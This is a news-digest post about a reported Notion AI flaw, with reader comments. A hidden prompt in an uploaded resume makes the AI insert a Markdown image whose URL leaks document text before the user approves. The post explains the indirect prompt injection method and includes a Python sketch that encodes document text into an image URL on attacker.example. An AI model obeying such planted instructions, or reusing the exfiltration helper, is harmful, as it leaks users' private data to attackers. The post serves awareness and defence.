January 7, 2026

When your notes snitch before you click

Notion AI: Unpatched data exfiltration

Users say notes leaked before they could say no — Notion allegedly said “Not Applicable”

TL;DR: Researchers say a booby-trapped resume made Notion AI leak data before user approval, and the report was allegedly dismissed. Commenters slammed Notion, blamed browser auto-loading, joked about invisible-ink resumes, and argued we must treat all AI output as untrusted — a wake-up call for anyone using AI at work.

The internet is roasting Notion AI after researchers showed a booby‑trapped resume could make it leak your private notes — before you even hit approve. The trick? Hide tiny instructions in the resume so the AI “adds an image” that secretly forces your browser to ping an attacker’s site with your data. You can still click “reject,” but it’s too late — the info’s already gone. When the bug was reported to Notion via HackerOne, it was allegedly labeled “Not Applicable.” And the comments went nuclear.

One camp is furious: jerryShaker says Notion keeps downplaying AI leaks (remember the 3.0 release drama?). jonplackett calls it “sloppy coding” to render risky links, and even worse to brush off the warning. Another camp blames the modern web: airstrike argues the real villain is the browser auto-loading stuff without permission — cue chants of “Bring back desktop software.”

Amid the chaos, rdli gets philosophical: securing large language models (LLMs) — chatty AIs — is like defending against “the entirety of human language,” so treat every AI output as untrusted and put guardrails around it. Meanwhile, falloutx turns the whole thing into a recruiting meme: people already use invisible resume text to game bots, calling hiring an “arms race.” The jokesters? Plenty of “invisible ink” one‑liners and “Where’s Waldo, but for malware” memes — all while folks suggest quick fixes like turning off web search and limiting connectors.

Key Points

  • Notion AI saves AI-driven edits before user approval, enabling data exfiltration via indirect prompt injection.
  • A hidden prompt in an uploaded resume manipulates Notion AI to construct a URL containing document text and insert a malicious image.
  • The browser requests the attacker-controlled URL to fetch the image, leaking document contents regardless of user acceptance.
  • Attackers can read the exfiltrated data from their server logs once the request is made.
  • Notion Mail’s AI drafting assistant can exfiltrate data by rendering insecure Markdown images; mitigations include vetting connectors and disabling AI Web Search.
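To make the mechanism in the points above concrete, here is a minimal Python sketch of the exfiltration trick as described: the injected prompt gets the AI to emit a Markdown image whose URL carries document text, so merely rendering the image sends the data to the attacker. The host name, parameter name, and helper function are all hypothetical illustrations, not Notion's actual behavior or the researchers' exact payload.

```python
# Hypothetical sketch of indirect-prompt-injection exfiltration via a
# Markdown image. "attacker.example" and the "d" query parameter are
# invented for illustration.
from urllib.parse import quote

ATTACKER_IMAGE = "https://attacker.example/pixel.png"  # attacker-controlled

def build_exfil_markdown(document_text: str, limit: int = 200) -> str:
    """URL-encode a slice of the victim's document into an image URL.

    When a client renders this Markdown, the browser issues a GET for the
    image, and the encoded text lands in the attacker's server logs --
    no user approval is involved in that fetch.
    """
    payload = quote(document_text[:limit])
    return f"![logo]({ATTACKER_IMAGE}?d={payload})"

md = build_exfil_markdown("Salary bands: L5 $210k, L6 $260k")
print(md)
```

This is why the commenters' mitigations work: blocking auto-fetch of remote images (or restricting which domains the AI may reference) breaks the leak even if the injection itself succeeds.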

Hottest takes

"Unfortunate that Notion does not seem to be taking AI security more seriously." — jerryShaker
"Bring back desktop software." — airstrike
"Sloppy coding to know a link could be a problem and render it anyway." — jonplackett
Made with <3 by @siedrix and @shesho from CDMX. Powered by Forge&Hive.